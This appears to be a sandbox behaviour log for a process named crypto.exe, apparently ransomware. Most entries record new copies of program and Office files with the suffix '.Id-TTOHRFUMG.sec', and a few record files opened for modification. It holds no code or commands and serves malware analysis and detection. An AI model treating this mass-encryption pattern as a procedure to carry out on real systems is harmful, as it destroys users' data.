File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Boise.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0298897.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_GreenTea.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\BlackTieLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\modules\common.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099153.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR5F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\master_preferences.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00914_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\skins\skin.catalog.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EquityMergeLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CoolType.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00546_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\navBack.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLLIBR.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\header.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_fi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105360.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10336_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\pt.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0287005.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Tulip.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153095.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7EN.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\QP.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\UrbanMergeFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_cs.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\libvlccore.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBBTN.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\orbd.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\MENU.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_description_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\sv.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150150.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PRTF9.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.HOL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14513_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONELEV.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OrielMergeFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ExecutiveNewsletter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESTL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_INIT.XSN.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0157995.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Perspective.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_justify.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287408.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\logging.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR42F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\gstreamer-lite.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IMPMAIL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\fieldswitch.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\IntroducingPowerPoint2010.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libdca_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\cmm\GRAY.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107188.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\UrbanReport.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\am.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\directshowtap.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Couture.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ccme_base.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152716.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUP.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\OliveGreen.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00494_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02134_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ENVELOPR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libmmdevice_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcolorthres_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libgl_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ar.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Premium.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL087.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105266.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Users.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Metro.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNote.gpd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libugly_resampler_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\CollectSignatures_Init.xsn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Slipstream.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUB6INTL.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SIGN.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7ES.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\splashscreen.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01041_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00414_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099199.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\RE00006_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18203_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\SBCGLOBAL.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01797_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02736G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\VVIEWER.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Cayman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\mobile.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR10F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18243_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\AIR98.POC.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\msmdlocal.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Foundry.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.Id-TTOHRFUMG.sec	crypto.exe
